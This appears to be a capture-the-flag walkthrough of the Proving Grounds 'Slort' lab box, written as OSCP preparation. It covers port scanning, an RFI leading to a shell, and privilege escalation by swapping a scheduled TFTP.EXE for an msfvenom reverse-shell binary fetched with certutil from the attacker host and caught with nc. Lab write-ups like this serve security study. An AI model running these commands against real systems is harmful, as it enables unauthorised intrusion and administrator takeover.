Proving grounds:Slort
Today we will take a look at Proving grounds: Slort. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| DNSVersionBindReqTCP, Help, NULL:
|_ Host '192.168.49.68' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.68.53:4443/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
5040/tcp open unknown
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC- Feroxbuster
feroxbuster — url http://192.168.68.53:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.asp,.aspx,.xmlCheck the “?page” parameter
RFİ
Do a simple rfi check.
Reverse shell
Prepare the payload
Ready now let’s run it with curl.
We got the shell.
There is a backup folder in the C:\ folder. Let’s look there
Info.txt shows the code that is executed every 5 minutes.
C:\Backup>more info.txt
more info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txtLet’s check our permissions on the folder. We have the authority to write and delete
PS C:\> icacls Backup
icacls Backup
Backup BUILTIN\Users:(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)I create a payload called TFTP.EXE. I’ll move and delete the original file and replace it with my own.
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=21 -f exe > TFTP.EXE
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytesDelete the original file
C:\Backup>del TFTP.EXE
del TFTP.EXE
upload our own file.
C:\Backup>certutil -urlcache -split -f http://192.168.49.68/TFTP.EXE
certutil -urlcache -split -f http://192.168.49.68/TFTP.EXE
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.Listen
└─$ sudo nc -nvlp 21
[sudo] password for kali:
listening on [any] 21 ...
connect to [192.168.49.68] from (UNKNOWN) [192.168.68.53] 50259
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
slort\administratorAnd now we are the Administrator
“If you have any questions or comments, please do not hesitate to write. Have a good days”
